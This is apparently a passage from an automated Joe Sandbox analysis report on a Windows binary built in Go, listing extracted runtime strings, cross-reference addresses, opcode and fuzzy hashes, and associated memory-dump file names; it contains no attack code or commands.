                      • String ID: G waiting list is corruptedGdipCreateBitmapFromHBITMAPGdipCreateHBITMAPFromBitmapGetSecurityDescriptorLengthGetUserPreferredUILanguagesPdhGetFormattedCounterValueSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlD$unreachableuserenv.dlluxtheme.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<ni$xTh$xTh
                      • API String ID: 0-3665277182
                      • Opcode ID: b5cdd342e3facc60dc067063ba73ad607790ca4368bd12db30005878ec31fe44
                      • Instruction ID: b56f1f0cc2c0cf01cb4b55159c6141ed2e1ec37e4617bfc5633afabfcdb4c75f
                      • Opcode Fuzzy Hash: b5cdd342e3facc60dc067063ba73ad607790ca4368bd12db30005878ec31fe44
                      • Instruction Fuzzy Hash: CB02B172604F84C5DB60EB25E44039EB7A2F789BD0F99A62ADA8D47B19CF7DC485C700
                      Strings
                      • newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWi, xrefs: 006B74C8
                      • casgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s, xrefs: 006B74EF
                      • runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned region45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDel, xrefs: 006B74AD
                      • casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign, xrefs: 006B7450
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWi$casgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned region45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDel
                      • API String ID: 0-3229847984
                      • Opcode ID: 794dddfd5d7c5b9bd4db76c3b89601f99917f0a6924ec1140a24e6d231b19fa6
                      • Instruction ID: 86ace7fbdbc635d0b3a3c4272119ec8b75e7c49fe31faeb7506416cfe8fa0a54
                      • Opcode Fuzzy Hash: 794dddfd5d7c5b9bd4db76c3b89601f99917f0a6924ec1140a24e6d231b19fa6
                      • Instruction Fuzzy Hash: 0BA1AFB6709B84C6DB54CB25E4813AEBBA2F389794F448126EF9D43B65CF39D485CB00
                      Strings
                      • chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressno such network interfaceno suitabl, xrefs: 00684D22
                      • G waiting list is corruptedGdipCreateBitmapFromHBITMAPGdipCreateHBITMAPFromBitmapGetSecurityDescriptorLengthGetUserPreferredUILanguagesPdhGetFormattedCounterValueSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlD, xrefs: 00684D46
                      • unreachableuserenv.dlluxtheme.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<ni, xrefs: 00684865
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: G waiting list is corruptedGdipCreateBitmapFromHBITMAPGdipCreateHBITMAPFromBitmapGetSecurityDescriptorLengthGetUserPreferredUILanguagesPdhGetFormattedCounterValueSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlD$chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressno such network interfaceno suitabl$unreachableuserenv.dlluxtheme.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<ni
                      • API String ID: 0-2605431326
                      • Opcode ID: d62f6864bc5859e73c6e2302b99312e790633f1390e793afc6712c74903da29c
                      • Instruction ID: f89b8cf1ee61721b89eec744355530fd1ceb83376c53d553171d2b500628bd35
                      • Opcode Fuzzy Hash: d62f6864bc5859e73c6e2302b99312e790633f1390e793afc6712c74903da29c
                      • Instruction Fuzzy Hash: F5F1E472604B85C6D760EB25E44039EB7A2F785BE4F94A72ADA9C47B99CF3CC485C700
                      Strings
                      • i, xrefs: 0069EAE9, 0069EB09
                      • released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin, xrefs: 0069EE6B
                      • fki, xrefs: 0069EE90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: i$fki$released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin
                      • API String ID: 0-2307413615
                      • Opcode ID: 5e8dd6d8c4e18fac07524ecf927c5d378f048e52529648daf6fbb928e4b65632
                      • Instruction ID: c93a2da61cccc9c7f0111feef17e1eaf0defa07cf8a64a3c0b0d8fd7d8cecf73
                      • Opcode Fuzzy Hash: 5e8dd6d8c4e18fac07524ecf927c5d378f048e52529648daf6fbb928e4b65632
                      • Instruction Fuzzy Hash: 1CA1F231A1AF45C5EB42DF25E840366A36AFB867C0F509626E98E17B36EF3DD481C740
                      Strings
                      • grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errorno, xrefs: 006A48EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errorno
                      • API String ID: 0-4206827478
                      • Opcode ID: 7c71561da07ece110732b5930d4cbccca8573dc03a591c4e60cdeaf0fc9fef1f
                      • Instruction ID: e589502ed9b43813700e182eb34a9c4cac909dcd9e1e9ce0a5a829867cd39158
                      • Opcode Fuzzy Hash: 7c71561da07ece110732b5930d4cbccca8573dc03a591c4e60cdeaf0fc9fef1f
                      • Instruction Fuzzy Hash: 88F17172609B8482DB609F15E48039EB7A2F78ABD4F585126EBCD47B29DF7CC851CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: KRt
                      • API String ID: 0-1550528960
                      • Opcode ID: d8291b3acbc0bfd67cce348c61f84461b2d8c1e253c83d34187d2b2e4fc79c8d
                      • Instruction ID: c5b162144f2c760627720d6967a888785b2fd4f69029af51a7342b368ce59dd8
                      • Opcode Fuzzy Hash: d8291b3acbc0bfd67cce348c61f84461b2d8c1e253c83d34187d2b2e4fc79c8d
                      • Instruction Fuzzy Hash: D4A1C272608F44C6DB10EF24E05439AB7B2F746BC4F98A62ADA8E17718DF79C586C740
                      Strings
                      • string concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standar, xrefs: 006C82A5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: string concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standar
                      • API String ID: 0-538685461
                      • Opcode ID: 54205acfbc63e5a2e59cf2a552693b8ae04736e648d92cd230e4e2a8c766042d
                      • Instruction ID: 180f1112d219b046d143a185956b75dff52320252781424efdec64440f091b49
                      • Opcode Fuzzy Hash: 54205acfbc63e5a2e59cf2a552693b8ae04736e648d92cd230e4e2a8c766042d
                      • Instruction Fuzzy Hash: B751A032708BA485DB20CF52E840BAAA766F388FC4F58841AEE8D57F18CF38C5528740
                      Strings
                      • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit19073, xrefs: 00694448, 00694459
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit19073
                      • API String ID: 0-319304838
                      • Opcode ID: 34010e9cce1147ce06215cdd713c60b841466cce8e29d20b3b92d1ef05b22e47
                      • Instruction ID: dc36437735268b5207a8a4ebda37c2a666109eeccb99244a7f9d0652cc41834c
                      • Opcode Fuzzy Hash: 34010e9cce1147ce06215cdd713c60b841466cce8e29d20b3b92d1ef05b22e47
                      • Instruction Fuzzy Hash: C151C572314B8186CF50DB15E4907AEB7A6F789B84F84542AEB8E43B29DF3CC559CB40
                      Strings
                      • gcmarknewobject called while doing checkmarkinsufficient data for calculated length typemult128bitPow10: power of 10 is out of rangeout of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: n, xrefs: 0069D32F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: gcmarknewobject called while doing checkmarkinsufficient data for calculated length typemult128bitPow10: power of 10 is out of rangeout of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: n
                      • API String ID: 0-1289113390
                      • Opcode ID: 7118516241a2f39ca3b61dc9722878126e2055adbf66fa2eb8bf976de8563089
                      • Instruction ID: daefc03005058176b45ec40089f5579f75a5316b490ddc668b678d6b03425687
                      • Opcode Fuzzy Hash: 7118516241a2f39ca3b61dc9722878126e2055adbf66fa2eb8bf976de8563089
                      • Instruction Fuzzy Hash: 6B21AFA3B11BC987EF009F25D4803986B62F3A6B84F89A576CA4D47B59CB6CC556C300
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8994d8bd32671462db21b55cd07723a2fbe01b74233fc7a35c99f5d2bda09d48
                      • Instruction ID: d105906971885453dc7531f60efc3bfe16b23d25e416b8630983f3b3a6117fe6
                      • Opcode Fuzzy Hash: 8994d8bd32671462db21b55cd07723a2fbe01b74233fc7a35c99f5d2bda09d48
                      • Instruction Fuzzy Hash: 3471CDA3B182F493EE00CA96A400DF9661EE366FD4B445511EE6F27F49D678CB07E304
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
